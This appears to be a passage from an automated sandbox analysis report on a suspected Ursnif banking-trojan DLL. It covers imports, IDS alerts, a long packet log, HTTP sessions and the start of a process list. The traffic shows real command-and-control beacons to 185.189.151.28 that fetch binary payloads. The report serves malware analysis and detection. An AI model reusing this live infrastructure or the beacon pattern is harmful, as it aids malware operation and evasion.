                               USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                               GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                               ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                               msvcrt.dll | strcoll, fgetwc, srand
                               Description | Data
                               LegalCopyright | A Company. All rights reserved.
                               InternalName | 
                               FileVersion | 1.0.0.0
                               CompanyName | A Company
                               ProductName | 
                               ProductVersion | 1.0.0.0
                               FileDescription | 
                               OriginalFilename | myfile.exe
                               Translation | 0x0409 0x04b0
                               Language of compilation system | Country where language is spoken | Map
                               English | United States | 
                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                               05/04/22-16:27:54.122082 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
                               05/04/22-16:27:53.231327 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
                               05/04/22-16:27:53.642851 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28
                               05/04/22-16:27:33.120656 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.43.16
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              May 4, 2022 16:27:53.572784901 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572830915 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.589708090 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589749098 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589780092 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589809895 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589833021 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589860916 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589904070 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589931965 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589935064 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.589962006 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.589972973 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.589982986 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590065002 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590138912 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590168953 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590210915 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590253115 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590281963 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590298891 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590303898 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590307951 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590334892 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590365887 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590394974 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590419054 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590424061 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590437889 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590440989 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590452909 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590483904 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590488911 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590504885 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590534925 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590553999 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590564966 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590594053 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590606928 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590624094 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590655088 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590672016 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590683937 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590703964 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590733051 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590735912 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590761900 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590792894 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590821981 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590832949 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590851068 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590881109 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590889931 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590903044 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590929985 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.590931892 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590960979 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.590991020 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591021061 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591022015 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591049910 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591079950 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591101885 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591121912 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591151953 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591164112 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591175079 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591203928 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591204882 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591233969 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591264963 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591269970 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591293097 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591322899 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591336012 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591351986 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591379881 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591389894 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591411114 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591433048 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591444969 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591463089 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591475010 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591538906 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591538906 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591563940 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591593981 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591624022 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591624975 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591653109 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591682911 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591694117 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591713905 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591742039 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591770887 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591773033 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591800928 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591804981 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591823101 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591850996 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591851950 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591881037 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591909885 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591938972 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591938972 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.591968060 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.591996908 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592003107 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592025042 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592053890 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592056036 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592077971 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592088938 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592106104 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592133999 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592165947 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592165947 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592195988 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592226028 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592226982 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592268944 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592272043 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592299938 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592323065 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.592334986 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.592400074 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.642851114 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.659950018 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934010029 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934067011 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934106112 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934146881 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934186935 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934225082 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934252977 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.934259892 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934302092 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934340000 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934380054 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934401035 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.934452057 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.934529066 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.934537888 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951416969 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951476097 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951536894 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951569080 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951596975 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951607943 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951613903 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951641083 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951642990 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951680899 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951690912 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951720953 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951721907 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951762915 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951771021 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951821089 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951832056 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951878071 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951893091 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951936960 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.951945066 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951984882 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.951987982 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952023983 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952024937 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952068090 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952071905 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952110052 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952116013 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952152014 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952166080 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952212095 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952224016 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952270031 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952275038 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952316046 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952317953 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952346087 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952364922 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952387094 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952394009 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952428102 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952430964 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952466011 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952507973 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952519894 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.952532053 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.952575922 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966340065 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966408014 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966420889 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966475964 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966480017 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966521978 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966538906 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966578960 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966598034 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966638088 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966667891 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966702938 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966718912 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966739893 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966752052 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966795921 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966800928 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966840029 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966849089 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966886997 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966897964 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966934919 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966947079 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.966984034 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.966995001 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.967029095 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.967034101 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.967067957 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.969260931 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.969315052 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.969321012 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.969364882 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.969364882 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.969398975 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.969419956 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.969446898 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.970865011 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.970917940 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.970926046 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.970966101 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.970974922 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971010923 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971014023 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971051931 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971055984 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971096039 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971101999 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971155882 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971157074 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971201897 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971203089 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971235037 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971246958 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971290112 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971290112 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971333027 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971338987 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971375942 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971378088 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971415997 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971420050 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971451044 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971458912 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971507072 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971673012 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971719027 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971720934 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971761942 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971767902 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971807957 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971811056 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971853971 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971857071 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971895933 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.971906900 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.971966982 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972050905 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972095966 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972100973 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972146988 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972150087 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972187996 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972193003 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972234011 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972242117 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972290039 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972290039 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972325087 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972337961 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972372055 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972382069 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972415924 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.972421885 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.972467899 CEST4976980192.168.2.4185.189.151.28
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name / CName | Address | Type | Class
May 4, 2022 16:27:33.081885099 CEST | 8.8.8.8 | 192.168.2.4 | 0xd133 | No error (0) | l-0007.l-dc-msedge.net | 13.107.43.16 | A (IP address) | IN (0x0001)
                              • 185.189.151.28
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49769 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2022 16:27:53.231327057 CEST | 1212 | OUT | GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
May 4, 2022 16:27:53.534866095 CEST | 1213 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 04 May 2022 14:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 186001
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="62728d697bd35.bin"
May 4, 2022 16:27:53.642851114 CEST | 1410 | OUT | GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
May 4, 2022 16:27:53.934010029 CEST | 1411 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 04 May 2022 14:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 238738
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="62728d69e08bf.bin"
                              May 4, 2022 16:27:54.122081995 CEST 1665 OUT GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:27:54.411616087 CEST 1667 IN HTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:27:54 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 1856
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d6a5f4fa.bin"



                              Target ID:0
                              Start time:16:27:10
                              Start date:04/05/2022
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                              Imagebase:0xe90000
                              File size:116736 bytes
                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:1
                              Start time:16:27:10
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
